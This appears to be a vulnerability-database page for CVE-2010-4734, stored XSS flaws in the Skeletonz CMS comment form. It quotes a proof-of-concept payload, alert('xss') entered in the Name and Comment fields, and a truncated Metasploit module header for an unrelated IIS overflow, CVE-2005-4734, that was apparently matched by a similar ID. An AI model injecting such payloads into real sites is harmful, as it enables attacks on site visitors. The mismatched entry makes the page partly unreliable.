CVE-2010-4734
Published 2011-02-16
Priority: P4 | 12 | low | 2.6 (CVSS 2.0)
AV:N/AC:H/Au:N/C:N/I:P/A:N
EXPLOIT
EPSS: 1.78% (75.4th percentile)
Multiple cross-site scripting (XSS) vulnerabilities in the comment feature in Skeletonz CMS 1.0, when the Blog plugin is enabled, allow remote attackers to inject arbitrary web script or HTML via the (1) Name, (2) Website, and (3) Email parameters. NOTE: some of these details are obtained from third party information.
No detection rules found.
Exploit-DB
Skeletonz CMS - Persistent Cross-Site Scripting
exploitdb·2010-11-28
CVE-2010-4734 Skeletonz CMS - Persistent Cross-Site Scripting
---
# Exploit Title: Xss on skeletonz-simple dynamic cms in the section comments
# Google Dork:
# Date: 27/11/10
# Author: Jordan Diaz aka Jbyte
# Software Link: http://orangoo.com/skeletonz/
# Version: 1.0
# Tested on: Windows xp
# CVE :
The following XSS is located in the comments section of the CMS Skeletonz
Xss Exploit
field Name: alert('xss');
field Comment: alert('xss');
Exploit-DB
Microsoft IIS - ISAPI RSA WebAgent Redirect Overflow (Metasploit)
exploitdb·2010-09-20
CVE-2005-4734 Microsoft IIS - ISAPI RSA WebAgent Redirect Overflow (Metasploit)
---
##
# $Id: rsa_webagent_redirect.rb 10394 2010-09-20 08:06:27Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Microsoft IIS ISAPI RSA WebAgent Redirect Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in the SecurID Web
Agent for IIS. This ISAPI filter runs in-process with
inetinfo.exe, any attempt to exploit this flaw will result
in the termination and potential restart of the IIS service.
},
'Author' => [ 'hdm' ],
'License' => MSF_
No writeups or analysis indexed.
http://packetstormsecurity.org/files/view/96151/skeletonzcms-xss.txt
http://secunia.com/advisories/42385
http://securityreason.com/securityalert/8081
http://www.exploit-db.com/exploits/15625
http://www.osvdb.org/69514
http://www.securityfocus.com/bid/45081